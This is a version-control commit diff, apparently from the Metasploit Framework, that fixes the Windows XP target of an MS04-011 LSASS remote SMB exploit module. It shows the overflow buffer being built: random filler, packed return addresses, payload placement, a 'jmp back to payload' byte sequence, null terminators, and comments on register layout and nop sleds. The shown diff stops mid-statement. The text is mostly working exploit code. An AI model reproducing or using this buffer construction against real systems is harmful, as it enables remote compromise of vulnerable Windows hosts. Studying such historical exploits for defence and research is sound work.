This fixes #44. The XP string was missing NDR encoding and null termination.

git-svn-id: file:///home/svn/framework3/trunk@4511 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-03-10 03:28:05 +00:00
parent 851328fbae
commit db198485a4
1 changed files with 10 additions and 5 deletions

View File

@ -97,8 +97,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
# Check the remote OS name and version # Check the remote OS name and version
os = smb_peer_os os = smb_peer_os
string = '' buff = ''
case os case os
# Windows 2000 requires that the string be unicode formatted # Windows 2000 requires that the string be unicode formatted
# and give us a nice set of registers which point back to # and give us a nice set of registers which point back to
# the un-unicoded data. We simply return to a nop sled that # the un-unicoded data. We simply return to a nop sled that
@ -108,7 +109,8 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
str = rand_text_alphanumeric(3500) str = rand_text_alphanumeric(3500)
str[2020, 4] = [targets[1]['Rets'][0]].pack('V') str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
str[2104, payload.encoded.length ] = payload.encoded str[2104, payload.encoded.length ] = payload.encoded
string = NDR.UnicodeConformantVaryingString(str) buff = NDR.UnicodeConformantVaryingString(str)
# Windows XP is a bit different, we need to use an ascii # Windows XP is a bit different, we need to use an ascii
# buffer and a jmp esp. The esp register points to an # buffer and a jmp esp. The esp register points to an
# eight byte segment at the end of our buffer in memory, # eight byte segment at the end of our buffer in memory,
@ -116,17 +118,20 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
# buffer, giving us about 1936 bytes of space for a # buffer, giving us about 1936 bytes of space for a
# payload. # payload.
when /Windows 5\.1/ when /Windows 5\.1/
str = rand_text_alphanumeric(7000) str = rand_text_alphanumeric(7000) + "\x00\x00"
str[0, payload.encoded.length ] = payload.encoded str[0, payload.encoded.length ] = payload.encoded
str[1964, 4] = [targets[2]['Rets'][0]].pack('V') str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
string = str str[6998, 2] = "\x00\x00"
buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
# Unsupported target
else else
print_status("No target is available for #{ os }") print_status("No target is available for #{ os }")
return return
end end
stub = string + stub = buff +
NDR.long(rand(0xFFFFFF)) + NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') +